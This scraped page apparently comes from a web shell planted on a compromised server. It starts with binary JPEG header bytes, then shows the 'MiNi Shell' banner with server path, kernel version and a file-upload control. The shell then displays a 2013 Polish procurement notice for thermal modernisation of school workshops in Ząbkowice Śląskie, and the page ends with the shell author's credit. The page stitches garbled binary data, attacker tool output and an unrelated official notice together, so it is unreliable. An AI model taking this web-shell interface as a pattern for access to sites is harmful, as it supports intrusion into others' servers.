JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130418/153316-N-2013.html

<p class="kh_header"><b>Ząbkowice Śląskie: Termomodernizacja 
       budynków Zespołu Szkół Ponadgimnazjalnych Nr 2 przy  ul. Wrocławskiej 17 Ząbkowicach Śl.-
       warsztaty szkolne  w ramach projektu Termomodernizacja obiektów Powiatu  Ząbkowickiego 
    w  celu zmniejszenia zużycia  energii dofinansowanego ze środków Narodowego Funduszu 
    Ochrony Środowiska i Gospodarki Wodnej w Warszawie.</b><br>
<b>Numer ogłoszenia: 153316 - 2013; data zamieszczenia: 18.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ząbkowicki , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat-zabkowicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja 
       budynków Zespołu Szkół Ponadgimnazjalnych Nr 2 przy  ul. Wrocławskiej 17 Ząbkowicach Śl.-
       warsztaty szkolne  w ramach projektu Termomodernizacja obiektów Powiatu  Ząbkowickiego 
    w  celu zmniejszenia zużycia  energii dofinansowanego ze środków Narodowego Funduszu 
    Ochrony Środowiska i Gospodarki Wodnej w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia dotyczy wykonania robót budowlanych zadania pn. Termomodernizacja budynków Zespołu Szkół Ponadgimnazjalnych Nr 2 przy  ul. Wrocławskiej 17 Ząbkowicach Śl. -warsztaty szkolne  w ramach projektu Termomodernizacja obiektów Powiatu  Ząbkowickiego w  celu zmniejszenia zużycia  energiidofinansowanego ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Warszawie.
2. Ogólny zakres rzeczowy robót w budynku obejmuje:
1) Ocieplenie ścian zewnętrznych styropianem gr. 14cm wraz z wymianą parapetów zewnętrznych i instalacji odgromowej,
2) Ocieplenie stropodachu wentylowanego od wewnątrz granulatem z wełny mineralnej o gr. 18cm nad Poradnią Psychologiczno-Pedagogiczną wraz z remontem pokrycia dachowego z papy,
3) Ocieplenie dachu nad warsztatami styropianem laminowanym z papą gr. 14cm, 
4) Wymiana stolarki okiennej na PCV i aluminiową, wraz z podokiennikami wewnętrznymi
5) Wymiana zewnętrznej stolarki drzwiowej,  
6) Wymiana kompleksowa instalacji centralnego ogrzewania,
7) Prace remontowe (schodów, balustrad itp.). 
3. Szczegółowo przedmiot zamówienia określają:
1) Projekty budowlane: 
a) termomodernizacji budynku - zał. nr 12 SIWZ,
b) przebudowy (wymiany) instalacji centralnego ogrzewania - zał. nr 13 SIWZ,
2) Specyfikacje techniczne wykonania i odbioru robót budowlanych - zał. nr 14-15 do SIWZ,  
3) Pomocniczo przedmiary robót - zał. nr 16-17 do SIWZ. 
4. Zamawiający zaleca dokonanie wizji lokalnej w budynku, w celu dokonania oceny dokumentów i informacji przekazywanych w ramach przedmiotowego postępowania niezbędnych do
       przygotowania oferty. 
5. Wykonawca zobowiązany jest do wykonania wszystkich robót niezbędnych do wykonania 
       przedmiotu zamówienia, zgodnie zasadami sztuki budowlanej i wiedzy technicznej, niezależnie od 
       tego, czy wynikają one wprost z dokumentów określonych w ust.3.3. 
6. Wymagania dotyczące robót:
       1) Wszystkie prace winny być wykonane zgodnie z przepisami, obowiązującymi normami, 
            warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż. oraz poleceniami inspektora 
            nadzoru.
       2) Roboty należy prowadzić zgodnie z wymogami i warunkami dokumentacji projektowej 
           określającej przedmiot zamówienia, specyfikacjami technicznymi wykonania i odbioru robót 
           budowlanych oraz wymogami niniejszej specyfikacji.
7. Wymagania dotyczące materiałów:
       1) Użyte materiały winny być w I gatunku jakościowym i wymiarowym, posiadające dopuszczenia
            do stosowania w budownictwie i zapewniające sprawność eksploatacyjną.
       2) Tam, gdzie w projektach budowlanych, specyfikacjach technicznych wykonania i odbioru robót 
            budowlanych oraz w pomocniczo w przedmiarach robót, zostało wskazane pochodzenie (marka, 
            znak towarowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o 
            których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów 
            lub rozwiązań równoważnych pod warunkiem, że zagwarantują one realizację robót w zgodzie z 
            wydanym pozwoleniem na budowę oraz zapewnią uzyskanie parametrów technicznych nie 
            gorszych od założonych w wyżej wymienionych dokumentach.
8. Ustalenia organizacyjne związane wykonaniem zamówienia:
       1) Prace budowlane będą wykonywane w czynnym obiekcie szkolnym. Prace w pomieszczeniach,
           w szczególności lekcyjnych, biurowych i użytkowych, oraz terminy ich zajęcia do wykonania 
           robót  przewidzianych projektem  Wykonawca będzie uzgadniał z Dyrektorem Zespołu Szkół 
           Ponadgimnazjalnych Nr 2 w Ząbkowicach Śl. 
 .     2) Wykonawca  zobowiązany jest każdorazowo (każdego dnia) po zakończeniu robót doprowadzić 
            pomieszczenia, o których mowa w pkt.1) oraz teren przy budynku do stanu czystości tak, aby 
            użytkowanie budynku odbywało się bez zakłóceń. 
       3) Lokalizację budek dla ptaków Wykonawca uzgodni z Zamawiającym w oparciu o posiadaną opinię
           ornitologą. 
9. Wymagania stawiane Wykonawcy:
       1) Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie 
            zamówienia, za jakość, zgodność z warunkami technicznymi i jakościowymi określonymi dla 
            przedmiotu zamówienia.
       2) Wymagana jest należyta staranność przy realizacji zamówienia rozumiana, jako staranność
            profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia,
  3) Sporządzenie planu bezpieczeństwa i ochrony zdrowia.
  4) Spełnienia innych wymagań określonych w projekcie umowy oraz wynikających z 
      obowiązujących  przepisów.
  5) Ustalenia dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z 
      ustanowionym przedstawicielem Wykonawcy. 
10. Możliwość zatrudnienia podwykonawców:
       Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części lub 
       całości zamówienia podwykonawcom, W takim przypadku Wykonawca jest zobowiązany do 
       wskazania w swojej ofercie zakresu zamówienia (robót), których wykonanie zamierza powierzyć 
       podwykonawcom.

11. Wymagania dotyczące gwarancji:
         1) Wykonawca obejmie gwarancją całość przedmiotu zamówienia na okres min.5 lat, licząc od daty 
             odbioru końcowego robót bez zastrzeżeń dla całości zamówienia.
         2) Reklamacje dotyczące stwierdzonych usterek i wad warunkujących użytkowanie budynku 
              załatwiane będą z należytą starannością niezwłocznie, bądź w terminie uzgodnionym pomiędzy 
              Zamawiającym a Wykonawcą. 
         3) Okresy gwarancji udzielane przez Podwykonawców muszą odpowiadać, co najmniej okresowi 
              udzielonemu przez Wykonawców.
         4) Warunki gwarancyjne Wykonawca przekaże Zamawiającemu przy odbiorze końcowym robót. 
12. Zamawiający oświadcza, że na Termomodernizację Warsztatów Szkolnych Zespołu Szkół 
         Ponadgimnazjalnych Nr 2 przy  ul. Wrocławskiej 17 w Ząbkowicach Śl.  posiada wymagane 
         przepisami pozwolenia, uzgodnienia i opinie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.42.11.00-5, 45.45.30.00-7, 45.33.11.00-7, 45.32.10.00-3, 45.26.21.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 48 000 zł.
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
      1) w pieniądzu; 
      2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, 
          że poręczenie kasy jest zawsze poręczeniem pieniężnym:
      3) gwarancjach bankowych:
      4) gwarancjach ubezpieczeniowych: 
      5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia
          9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 
         2007r. Nr 42, poz.275). 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem  na rachunek bankowy Zamawiającego
       nr 10 9533 0004 2001 0002 6260 0007 w Banku Spółdzielczym w Ząbkowicach Śl. 
       Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. 
    Na poleceniu przelewu należy wpisać Termomodernizacja budynku warsztatów szkolnych ZSP 
    Nr 2  przy  ul. Wrocławskiej 17 w Ząbkowicach Śl. 
4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
5. Wadium wnosi się przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium
       w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
6.Wadium wniesione w pieniądzu zostanie zwrócone wraz z odsetkami wynikającymi z umowy
       rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia 
       rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
      przez Wykonawcę.
7. Wadium wniesione w formie innej niż pieniądzu należy złożyć w formie oryginału.
8. Polisa, gwarancja, poręczenie lub inny dokument stanowiący formę wadium winien zawierać 
       stwierdzenie, że na pierwsze żądanie Zamawiającego wzywające do zapłaty wadium zgodnie z 
       warunkami SIWZ, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony 
       gwaranta/poręczyciela.
9. Z udziału w postępowaniu wyklucza się Wykonawców, którzy nie wnieśli wadium w wymaganym
       terminie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli 
          okres prowadzenia działalności jest krótszy - w tym okresie, wykonał przynajmniej dwie roboty. Ocena spełnienia warunku dokonana będzie w oparciu o złożone przez Wykonawcę dokumenty wg formuły spełnia- nie spełnia.
          polegające na wymianie instalacji centralnego ogrzewania o wartości min.200 000 zł brutto każda, 
          oraz jedną robotę termomodernizacyjną  połączoną z wymianą stolarki okiennej i drzwiowej o
          wartości min.1 500 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, ze dysponuje lub dysponować będzie osobą na stanowisko kierownika
          budowy posiadającego uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, a na 
          kierownika robót instalacyjnych uprawnienia w specjalności instalacyjno-inżynieryjnej w zakresie 
          instalacji sanitarnych i min.5 letnie doświadczenie kierowania robotami. Ocena spełnienia warunku dokonana będzie w oparciu o złożone przez Wykonawcę dokumenty wg formuły spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
          działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 
          2 000 000 zł, oraz że posiada środki finansowe lub zdolność kredytową w wysokości min. 
          1 800 000 zł. Ocena spełnienia warunku dokonana będzie w oparciu o złożone przez Wykonawcę dokumenty wg formuły spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
      2) Oznaczenia danych dotyczących Zamawiającego lub Wykonawcy. 
3) Składu Konsorcjum, zmiany Podwykonawców, formy wniesienia zabezpieczenia należytego 
    wykonania umowy, 
      4) Terminu i zakresu wykonania zamówienia z przyczyn niezależnych od Zamawiającego i Wykonawcy,
           które zaistniały w trakcie realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-zabkowicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śląskie
pokój 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2013 godzina 10:00, miejsce: Powiat Ząbkowicki
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śląskie
Biuro podawcze pok. 110.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com